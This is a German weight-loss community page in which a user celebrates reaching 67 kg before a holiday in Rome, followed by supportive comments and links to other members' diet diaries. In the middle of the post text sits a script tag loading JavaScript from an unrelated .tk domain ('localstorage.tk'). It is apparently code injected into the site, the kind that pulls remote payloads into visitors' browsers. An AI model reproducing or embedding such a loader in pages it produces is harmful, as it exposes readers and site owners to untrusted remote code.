Zum Inhalt springen

Sie sind hier

Motivation durch Erfolg :)

0  0
Ein Diät-Erfolg von , geschrieben am

Endlich habe ich die 67er erreicht, und das motiviert mich so sehr, da diese Zahl noch nie auf der Waage stand, seitdem ich abnehme. Tolles Gefühl und ich bleibe definitiv dran. In einer Woche geht's nach Rom, und wenn zu dem Zeitpunkt dann die 66er erreicht wären, wäre das super! Smile
Nur dann muss ich mich auch anstrengen, mein Gewicht nicht wieder zu ruinieren durch diesen Urlaub, aber ich bin davon überzeugt, dass ich mich beherschen kann.
Nur noch ca. 7 Kilo bis zu meinem Wunschgewicht, anstatt 12 Wink

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Kommentare

Bild des Benutzers Julius
0  0

Super!!! Weiter so du schaffst das!!!

Bild des Benutzers laughy
0  0

Klasse , jedes weitere Kilo macht einen noch Stolzer Smile

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Ziel für den Abnehmplan von Solveigh: in jedem Anfang wohnt ein Zauber inne.... Anfang ist hierbei gemäß der Definition Anfang in der Diät- Clique.  Es ist toll, von anderen zu lesen, inspiriert zu werden und sich gegenseitig gut zu tun...
Eintrag in ein Ernährungstagebuch von kortes: ...minus 1,8 Kg. Da war ich heute morgen echt platt. Gut ich habe es schon im Laufe der Woche gemerkt, dass da richtig was geht. Meine neuen Hosen wurden mir weit, die Blusen schlabbern und ich bin...
Ziel für den Abnehmplan von Juergen12053: ... mit meinen Startgewicht von 121 kg am 31.07.17 bei einer Körpergröße von 173,5 cm fühle ich mich unwohl, unbeweglich, träge und ja auch unatraktiv - das möchte ich ändern - ... und mich ab heute...
Eintrag in ein Ernährungstagebuch von Juergen12053: Essen: Frühstück Tomaten und zwei Scheiben belegtes Brot; Mittag 250g Joghurt mit zwei kleingeschnittenen Necktarienen untergerüht (Necktarienen sind süß, enthalten also Kohlehydrate im Fruchtzucker...
Motivation von Janchen495: Ich nehme nur für mich ab und nicht um andere Menschen zu beeindrucken...ich möchte mich in meinem Körper wieder wohl fühlen...wenn ich mein Wunschgewicht erreicht habe werde ich mich mit einem...
Eintrag in ein Ernährungstagebuch von Shayleene: Jaaa ich lebe noch. Merke, dass ich länger nicht mehr geschrieben habe. War viel los. Zuerst mein Neffe bei mir auf Besuch und danach ging es schon bald nach London. Von meinem Urlaub bin ich wieder...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps